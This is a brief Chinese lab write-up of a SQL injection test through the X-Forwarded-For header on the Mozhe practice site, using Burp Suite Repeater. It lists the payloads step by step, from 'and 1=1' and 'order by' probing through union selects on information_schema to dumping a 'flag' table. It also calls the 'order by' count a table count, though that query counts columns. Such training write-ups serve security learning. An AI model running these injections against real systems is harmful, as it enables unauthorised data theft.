HTTP头注入漏洞测试(X-Forwarded-for)
用bp抓墨者任性网站的包,发送给repeater模块,自己填入X-Forwarded-For,然后判断是否可注入。
输入and 1=1发现没有报错,证明存在注入点
用order by判断表的数量
输入到5就报错了,说明只有4个表
构建语句union select 1,2,3,4
发现名称,价格,数量都对应这些数字
通过union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())
发现有个flag的表名,接下来
union select 1,2,3,(select group_concat(flag) from flag)
获得flag,然后获得key